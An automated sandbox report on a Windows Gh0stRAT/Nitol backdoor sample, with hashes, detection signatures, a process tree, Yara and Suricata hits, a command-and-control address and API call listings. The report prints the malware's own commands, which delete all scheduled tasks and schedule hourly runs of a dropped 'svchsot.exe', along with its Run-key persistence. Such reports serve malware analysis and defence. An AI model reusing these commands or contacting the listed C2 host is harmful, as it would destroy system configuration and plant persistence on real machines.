Windows Analysis Report
ILQ18dgzMU.exe

Overview

General Information

Sample name: ILQ18dgzMU.exe (renamed because the original name is a hash value)
Original sample name: a153080f9a968b6488cf1cf2e2ea78a3.exe
Analysis ID: 1565415
MD5: a153080f9a968b6488cf1cf2e2ea78a3
SHA1: 6537f18fb326bcb4d7fc503c40b7bb21a136f560
SHA256: e0989c99125dbc5957c7ecdfdc37ff6b7f31f2979531f3fb8747127243f28b7d
Tags: exe, Gh0stRAT, user-abuse_ch

Detection

GhostRat, Nitol
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
Yara detected Nitol
AI detected suspicious sample
Checks if browser processes are running
Contains functionality to detect sleep reduction / modifications
Contains functionality to detect virtual machines (IN, VMware)
Drops executables to the windows directory (C:\Windows) and starts them
Found stalling execution ending in API Sleep call
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Delete All Scheduled Tasks
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to delete services
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ILQ18dgzMU.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\ILQ18dgzMU.exe" MD5: A153080F9A968B6488CF1CF2E2EA78A3)
    • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7468 cmdline: schtasks /delete /tn * /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • sc.exe (PID: 7484 cmdline: sc config Schedule start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • net.exe (PID: 7500 cmdline: net start "Task Scheduler" MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7516 cmdline: C:\Windows\system32\net1 start "Task Scheduler" MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • at.exe (PID: 7532 cmdline: At 0:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7548 cmdline: At 1:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7568 cmdline: At 2:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7584 cmdline: At 3:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7608 cmdline: At 4:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7628 cmdline: At 5:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7664 cmdline: At 6:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7680 cmdline: At 7:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7696 cmdline: At 8:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7712 cmdline: At 9:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7728 cmdline: At 10:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7744 cmdline: At 11:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7760 cmdline: At 12:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7776 cmdline: At 13:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7792 cmdline: At 14:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7808 cmdline: At 15:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7824 cmdline: At 16:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7840 cmdline: At 17:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7856 cmdline: At 18:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7872 cmdline: At 19:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7888 cmdline: At 20:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7904 cmdline: At 21:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7920 cmdline: At 22:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7936 cmdline: At 23:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7952 cmdline: At 24:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
  • svchsot.exe (PID: 8024 cmdline: "C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe" MD5: A153080F9A968B6488CF1CF2E2EA78A3)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
dump.pcap | gh0st | unknown | https://github.com/jackcr/ |
  • 0x32abd:$a: 47 68 30 73 74 AB 00 00 00 18 01 00 00 78 9C
  • 0x10cde7:$a: 47 68 30 73 74 AA 00 00 00 18 01 00 00 78 9C
  • 0x172dba:$a: 47 68 30 73 74 AA 00 00 00 18 01 00 00 78 9C

Source | Rule | Description | Author | Strings
00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp | gh0st | unknown | https://github.com/jackcr/ |
  • 0x0:$a: 47 68 30 73 74 AA 00 00 00 18 01 00 00 78 9C
00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nitol | Yara detected Nitol | Joe Security |
00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp | gh0st | unknown | https://github.com/jackcr/ |
  • 0x0:$a: 47 68 30 73 74 AA 00 00 00 18 01 00 00 78 9C

System Summary

Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: schtasks /delete /tn * /f, CommandLine: schtasks /delete /tn * /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7412, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /delete /tn * /f, ProcessId: 7468, ProcessName: schtasks.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ILQ18dgzMU.exe, ProcessId: 7384, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\XXXXXX579E5A5B VVVVVVrr2unw==
Source: Process started; Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements); Data: Command: net start "Task Scheduler", CommandLine: net start "Task Scheduler", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7412, ParentProcessName: cmd.exe, ProcessCommandLine: net start "Task Scheduler", ProcessId: 7500, ProcessName: net.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: net start "Task Scheduler", CommandLine: net start "Task Scheduler", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7412, ParentProcessName: cmd.exe, ProcessCommandLine: net start "Task Scheduler", ProcessId: 7500, ProcessName: net.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T19:12:53.559954+0100 | 2016922 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 172.65.190.172 | 8000 | TCP
2024-11-29T19:14:19.251251+0100 | 2016922 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49917 | 172.65.190.172 | 8000 | TCP
2024-11-29T19:15:44.988375+0100 | 2016922 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50004 | 172.65.190.172 | 8000 | TCP
2024-11-29T19:12:53.559954+0100 | 2013214 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 172.65.190.172 | 8000 | TCP
2024-11-29T19:14:19.251251+0100 | 2013214 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49917 | 172.65.190.172 | 8000 | TCP
2024-11-29T19:15:44.988375+0100 | 2013214 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50004 | 172.65.190.172 | 8000 | TCP

AV Detection

Source: ILQ18dgzMU.exe; Avira: detected
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Avira: detection malicious, Label: BDS/Agent.IR
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; ReversingLabs: Detection: 94%
Source: ILQ18dgzMU.exe; ReversingLabs: Detection: 94%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Joe Sandbox ML: detected
Source: ILQ18dgzMU.exe; Joe Sandbox ML: detected
Source: ILQ18dgzMU.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA; 0_2_10001A20
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen; 0_2_100014B0
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_10008880 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA; 0_2_10008880
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_10009090 FindFirstFileA,FindClose,CreateFileA,CloseHandle; 0_2_10009090
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_10008CE0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose; 0_2_10008CE0
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_100086B0 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose; 0_2_100086B0
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_10008FD0 FindFirstFileA,FindClose,FindClose; 0_2_10008FD0
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Code function: 32_2_10008880 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA; 32_2_10008880
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Code function: 32_2_10009090 FindFirstFileA,FindClose,CreateFileA,CloseHandle; 32_2_10009090
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Code function: 32_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA; 32_2_10001A20
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Code function: 32_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen; 32_2_100014B0
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Code function: 32_2_10008CE0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose; 32_2_10008CE0
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Code function: 32_2_100086B0 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose; 32_2_100086B0
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Code function: 32_2_10008FD0 FindFirstFileA,FindClose,FindClose; 32_2_10008FD0
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_100084F0 GetLogicalDriveStringsA,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,lstrlen,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlen; 0_2_100084F0

Networking

Source: Network traffic; Suricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.4:49736 -> 172.65.190.172:8000
Source: Network traffic; Suricata IDS: 2016922 - Severity 1 - ET MALWARE Backdoor family PCRat/Gh0st CnC traffic : 192.168.2.4:49736 -> 172.65.190.172:8000
Source: Network traffic; Suricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.4:49917 -> 172.65.190.172:8000
Source: Network traffic; Suricata IDS: 2016922 - Severity 1 - ET MALWARE Backdoor family PCRat/Gh0st CnC traffic : 192.168.2.4:49917 -> 172.65.190.172:8000
Source: Network traffic; Suricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.4:50004 -> 172.65.190.172:8000
Source: Network traffic; Suricata IDS: 2016922 - Severity 1 - ET MALWARE Backdoor family PCRat/Gh0st CnC traffic : 192.168.2.4:50004 -> 172.65.190.172:8000
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_1000B880 Sleep,wsprintfA,GetTickCount,GetTickCount,wsprintfA,URLDownloadToFileA,GetTempPathA,fopen,fscanf,fscanf,GetTickCount,wsprintfA,GetTickCount,wsprintfA,URLDownloadToFileA,ShellExecuteA,fscanf,fclose,DeleteFileA,Sleep; 0_2_1000B880
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 6 times)
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA; 0_2_10001A20
Source: global traffic; DNS traffic detected: DNS query: www.wk1888.com
Source: global traffic; DNS traffic detected: DNS query: www.af0575.com
Source: global traffic; DNS traffic detected: DNS query: www.fz0575.com
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_1000FBB0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard; 0_2_1000FBB0
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Code function: 32_2_1000FBB0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard; 32_2_1000FBB0
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_1000FC20 OpenClipboard,GetClipboardData,CloseClipboard,GlobalSize,GlobalLock,??2@YAPAXI@Z,GlobalUnlock,CloseClipboard,??3@YAXPAX@Z; 0_2_1000FC20

E-Banking Fraud

Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command; 0_2_1000A840
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Code function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command; 32_2_1000A840
Source: at.exe; Process created: 50

System Summary

Source: dump.pcap, type: PCAP; Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000000.00000003.3090838933.0000000002150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: gh0st Author: https://github.com/jackcr/
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_10002920 NtdllDefWindowProc_A; 0_2_10002920
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Code function: 32_2_10002920 NtdllDefWindowProc_A; 32_2_10002920
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_10010E20 OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,DeleteService,RegDeleteKeyA,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,OpenSCManagerA,OpenServiceA,LockServiceDatabase,OpenSCManagerA,OpenServiceA,LockServiceDatabase,OpenSCManagerA,OpenServiceA,ControlService,CloseServiceHandle,OpenSCManagerA,OpenServiceA,LockServiceDatabase,ChangeServiceConfigA,UnlockServiceDatabase,CloseServiceHandle,CloseServiceHandle,Sleep; 0_2_10010E20
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_100121A0 ExitWindowsEx; 0_2_100121A0
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; Code function: 0_2_1000B280 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx; 0_2_1000B280
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Code function: 32_2_100121A0 ExitWindowsEx; 32_2_100121A0
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe; Code function: 32_2_1000B280 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx; 32_2_1000B280
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; File created: C:\Windows\SysWOW64\Default
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT
Source: C:\Users\user\Desktop\ILQ18dgzMU.exe; File created: C:\Windows\SysWOW64\579E5A5B VVVVVVrr2unw==
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10064E800_2_10064E80
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10015EA00_2_10015EA0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100646B00_2_100646B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10047EF00_2_10047EF0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10041F200_2_10041F20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001CF300_2_1001CF30
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003B7300_2_1003B730
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100297500_2_10029750
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100537660_2_10053766
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10054F6A0_2_10054F6A
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100387700_2_10038770
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10051F790_2_10051F79
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10016F800_2_10016F80
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10044F800_2_10044F80
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10043F900_2_10043F90
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10037FA00_2_10037FA0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100427B00_2_100427B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1002FFC00_2_1002FFC0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001DFE00_2_1001DFE0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10036FE00_2_10036FE0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1002CFF00_2_1002CFF0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10045FF00_2_10045FF0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002D80032_2_1002D800
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003081032_2_10030810
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003901032_2_10039010
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1006881032_2_10068810
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001581D32_2_1001581D
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003582032_2_10035820
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003982032_2_10039820
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004002032_2_10040020
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003604032_2_10036040
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005284132_2_10052841
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003A85032_2_1003A850
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003686032_2_10036860
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100418A032_2_100418A0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100138C032_2_100138C0
